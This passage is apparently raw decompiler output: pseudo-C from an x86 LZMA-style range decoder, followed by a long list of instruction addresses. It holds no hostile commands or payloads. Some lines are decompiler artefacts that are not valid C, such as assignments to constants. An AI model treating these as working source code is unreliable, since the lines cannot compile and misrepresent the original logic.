                                                							goto L36;
                                                						case 0xe:
                                                							goto L45;
                                                						case 0xf:
                                                							goto L57;
                                                						case 0x10:
                                                							L109:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x10;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t365 = __ebp - 0x70;
                                                							 *_t365 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t365;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							goto L111;
                                                						case 0x11:
                                                							L68:
                                                							__esi =  *(__ebp - 0x58);
                                                							 *(__ebp - 0x84) = 0x12;
                                                							goto L132;
                                                						case 0x12:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 0x58);
                                                								 *(__ebp - 0x84) = 0x13;
                                                								__esi =  *(__ebp - 0x58) + 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							__eflags = __eax;
                                                							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                							goto L130;
                                                						case 0x13:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								_t469 = __ebp - 0x58;
                                                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                								__eflags =  *_t469;
                                                								 *(__ebp - 0x30) = 0x10;
                                                								 *(__ebp - 0x40) = 8;
                                                								L144:
                                                								 *(__ebp - 0x7c) = 0x14;
                                                								goto L145;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							 *(__ebp - 0x30) = 8;
                                                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                							L130:
                                                							 *(__ebp - 0x58) = __eax;
                                                							 *(__ebp - 0x40) = 3;
                                                							goto L144;
                                                						case 0x14:
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                							__eax =  *(__ebp - 0x80);
                                                							goto L140;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags =  *(__ebp - 0x38) - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                							goto L120;
                                                						case 0x16:
                                                							__eax =  *(__ebp - 0x30);
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx =  *(__ebp - 4);
                                                							 *(__ebp - 0x40) = 6;
                                                							__eax = __eax << 7;
                                                							 *(__ebp - 0x7c) = 0x19;
                                                							 *(__ebp - 0x58) = __eax;
                                                							goto L145;
                                                						case 0x17:
                                                							L145:
                                                							__eax =  *(__ebp - 0x40);
                                                							 *(__ebp - 0x50) = 1;
                                                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                							goto L149;
                                                						case 0x18:
                                                							L146:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x18;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t484 = __ebp - 0x70;
                                                							 *_t484 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t484;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L148:
                                                							_t487 = __ebp - 0x48;
                                                							 *_t487 =  *(__ebp - 0x48) - 1;
                                                							__eflags =  *_t487;
                                                							L149:
                                                							__eflags =  *(__ebp - 0x48);
                                                							if( *(__ebp - 0x48) <= 0) {
                                                								__ecx =  *(__ebp - 0x40);
                                                								__ebx =  *(__ebp - 0x50);
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                								__eax =  *(__ebp - 0x7c);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								goto L140;
                                                							}
                                                							__eax =  *(__ebp - 0x50);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                							__eax =  *(__ebp - 0x58);
                                                							__esi = __edx + __eax;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								 *(__ebp - 0x50) = __edx;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L148;
                                                							} else {
                                                								goto L146;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								 *(__ebp - 0x2c) = __ebx;
                                                								L119:
                                                								_t393 = __ebp - 0x2c;
                                                								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                								__eflags =  *_t393;
                                                								L120:
                                                								__eax =  *(__ebp - 0x2c);
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                									goto L170;
                                                								}
                                                								__eflags = __eax -  *(__ebp - 0x60);
                                                								if(__eax >  *(__ebp - 0x60)) {
                                                									goto L171;
                                                								}
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                								__eax =  *(__ebp - 0x30);
                                                								_t400 = __ebp - 0x60;
                                                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                								__eflags =  *_t400;
                                                								goto L123;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							 *(__ebp - 0x2c) = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								 *(__ebp - 0x48) = __ecx;
                                                								L102:
                                                								__eflags =  *(__ebp - 0x48);
                                                								if( *(__ebp - 0x48) <= 0) {
                                                									__eax = __eax + __ebx;
                                                									 *(__ebp - 0x40) = 4;
                                                									 *(__ebp - 0x2c) = __eax;
                                                									__eax =  *(__ebp - 4);
                                                									__eax =  *(__ebp - 4) + 0x644;
                                                									__eflags = __eax;
                                                									L108:
                                                									__ebx = 0;
                                                									 *(__ebp - 0x58) = __eax;
                                                									 *(__ebp - 0x50) = 1;
                                                									 *(__ebp - 0x44) = 0;
                                                									 *(__ebp - 0x48) = 0;
                                                									L112:
                                                									__eax =  *(__ebp - 0x40);
                                                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                										_t391 = __ebp - 0x2c;
                                                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                										__eflags =  *_t391;
                                                										goto L119;
                                                									}
                                                									__eax =  *(__ebp - 0x50);
                                                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                									__eax =  *(__ebp - 0x58);
                                                									__esi = __edi + __eax;
                                                									 *(__ebp - 0x54) = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                									__eflags =  *(__ebp - 0xc) - __edx;
                                                									if( *(__ebp - 0xc) >= __edx) {
                                                										__ecx = 0;
                                                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                										__ecx = 1;
                                                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                										__ebx = 1;
                                                										__ecx =  *(__ebp - 0x48);
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx =  *(__ebp - 0x44);
                                                										__ebx =  *(__ebp - 0x44) | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										 *(__ebp - 0x44) = __ebx;
                                                										 *__esi = __ax;
                                                										 *(__ebp - 0x50) = __edi;
                                                									} else {
                                                										 *(__ebp - 0x10) = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                									if( *(__ebp - 0x10) >= 0x1000000) {
                                                										L111:
                                                										_t368 = __ebp - 0x48;
                                                										 *_t368 =  *(__ebp - 0x48) + 1;
                                                										__eflags =  *_t368;
                                                										goto L112;
                                                									} else {
                                                										goto L109;
                                                									}
                                                								}
                                                								__ecx =  *(__ebp - 0xc);
                                                								__ebx = __ebx + __ebx;
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                									__ecx =  *(__ebp - 0x10);
                                                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									 *(__ebp - 0x44) = __ebx;
                                                								}
                                                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                								if( *(__ebp - 0x10) >= 0x1000000) {
                                                									L101:
                                                									_t338 = __ebp - 0x48;
                                                									 *_t338 =  *(__ebp - 0x48) - 1;
                                                									__eflags =  *_t338;
                                                									goto L102;
                                                								} else {
                                                									goto L99;
                                                								}
                                                							}
                                                							__edx =  *(__ebp - 4);
                                                							__eax = __eax - __ebx;
                                                							 *(__ebp - 0x40) = __ecx;
                                                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                							goto L108;
                                                						case 0x1a:
                                                							goto L55;
                                                						case 0x1b:
                                                							L75:
                                                							__eflags =  *(__ebp - 0x64);
                                                							if( *(__ebp - 0x64) == 0) {
                                                								 *(__ebp - 0x88) = 0x1b;
                                                								goto L170;
                                                							}
                                                							__eax =  *(__ebp - 0x14);
                                                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                							__eflags = __eax -  *(__ebp - 0x74);
                                                							if(__eax >=  *(__ebp - 0x74)) {
                                                								__eax = __eax +  *(__ebp - 0x74);
                                                								__eflags = __eax;
                                                							}
                                                							__edx =  *(__ebp - 8);
                                                							__cl =  *(__eax + __edx);
                                                							__eax =  *(__ebp - 0x14);
                                                							 *(__ebp - 0x5c) = __cl;
                                                							 *(__eax + __edx) = __cl;
                                                							__eax = __eax + 1;
                                                							__edx = 0;
                                                							_t274 = __eax %  *(__ebp - 0x74);
                                                							__eax = __eax /  *(__ebp - 0x74);
                                                							__edx = _t274;
                                                							__eax =  *(__ebp - 0x68);
                                                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                							_t283 = __ebp - 0x64;
                                                							 *_t283 =  *(__ebp - 0x64) - 1;
                                                							__eflags =  *_t283;
                                                							 *( *(__ebp - 0x68)) = __cl;
                                                							goto L79;
                                                						case 0x1c:
                                                							while(1) {
                                                								L123:
                                                								__eflags =  *(__ebp - 0x64);
                                                								if( *(__ebp - 0x64) == 0) {
                                                									break;
                                                								}
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__edx =  *(__ebp - 8);
                                                								__cl =  *(__eax + __edx);
                                                								__eax =  *(__ebp - 0x14);
                                                								 *(__ebp - 0x5c) = __cl;
                                                								 *(__eax + __edx) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t414 = __eax %  *(__ebp - 0x74);
                                                								__eax = __eax /  *(__ebp - 0x74);
                                                								__edx = _t414;
                                                								__eax =  *(__ebp - 0x68);
                                                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                								__eflags =  *(__ebp - 0x30);
                                                								 *( *(__ebp - 0x68)) = __cl;
                                                								 *(__ebp - 0x14) = __edx;
                                                								if( *(__ebp - 0x30) > 0) {
                                                									continue;
                                                								} else {
                                                									goto L80;
                                                								}
                                                							}
                                                							 *(__ebp - 0x88) = 0x1c;
                                                							goto L170;
                                                					}
                                                				}
                                                			}













                                                0x00000000
                                                0x004068da
                                                0x004068da
                                                0x004068df
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00406f46
                                                0x00406f46
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00406fbc
                                                0x00406fbc
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00406f97
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00000000
                                                0x0040714a
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb9
                                                0x00000000
                                                0x00406fb9
                                                0x004068e1
                                                0x004068e1
                                                0x004068e5
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b6f
                                                0x00406b72
                                                0x00406b15
                                                0x00406b1b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b74
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00000000
                                                0x00406b12
                                                0x0040692c
                                                0x0040692c
                                                0x0040692f
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a1e
                                                0x00406a21
                                                0x00406998
                                                0x00406998
                                                0x0040699e
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aab
                                                0x00406aae
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a4e
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406c85
                                                0x00406c85
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406a27
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00407160
                                                0x00407168
                                                0x0040716f
                                                0x00407171
                                                0x00407178
                                                0x0040717c
                                                0x0040717c
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00000000
                                                0x00406995
                                                0x00406a21
                                                0x0040692a
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00407175
                                                0x00407175
                                                0x00000000
                                                0x00407175
                                                0x0040676d
                                                0x00000000
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d7
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406ba8
                                                0x00406bab
                                                0x00406bae
                                                0x00406bb1
                                                0x00406bb4
                                                0x00406bb6
                                                0x00406bbd
                                                0x00406bbe
                                                0x00406bc0
                                                0x00406bc3
                                                0x00406bc6
                                                0x00406bc9
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406bce
                                                0x00406b7f
                                                0x00406b82
                                                0x00406b85
                                                0x00406b8f
                                                0x00000000
                                                0x00000000
                                                0x00406be3
                                                0x00406be7
                                                0x00406c0a
                                                0x00406c0d
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406be9
                                                0x00406bec
                                                0x00406bef
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406c02
                                                0x00000000
                                                0x00000000
                                                0x00406c26
                                                0x00406c2a
                                                0x00000000
                                                0x00000000
                                                0x00406c30
                                                0x00406c34
                                                0x00000000
                                                0x00000000
                                                0x00406c3a
                                                0x00406c3c
                                                0x00406c40
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406cb2
                                                0x00000000
                                                0x00406cb2
                                                0x00406c9d
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00406cd8
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ceb
                                                0x00406cf0
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00406bd1
                                                0x00406bd1
                                                0x00406bd4
                                                0x00000000
                                                0x00000000
                                                0x00406f10
                                                0x00406f14
                                                0x00406f36
                                                0x00406f39
                                                0x00406f43
                                                0x00000000
                                                0x00406f43
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f20
                                                0x00406f23
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00407004
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00407042
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00000000
                                                0x004070b6
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407066
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x00407098
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
